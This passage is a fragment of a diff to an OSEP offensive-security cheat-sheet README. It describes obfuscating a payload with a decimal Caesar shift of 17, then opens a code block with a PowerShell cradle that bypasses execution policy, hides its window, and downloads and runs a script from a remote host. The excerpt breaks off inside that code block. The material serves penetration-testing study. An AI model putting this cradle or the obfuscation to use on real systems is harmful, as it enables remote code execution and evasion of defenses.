peterkhe1999/CheatSheet/OSEP/README.md

 Converting the ASCII string to its decimal representation and then performing a Caesar cipher encryption on the result.

-Inside the loop, the byte value of each character is increased by 17. > Use if and else conditions to pad the character's decimal representation to 3 digits.
+Inside the loop, the byte value of each character is increased by `17` > Use `if` and `else` conditions to pad the character's decimal representation to `3` digits.

 ```pwsh
 $payload = "powershell -exec bypass -nop -w hidden -c iex((new-object system.net.webclient).downloadstring('http://192.168.119.120/run.txt'))"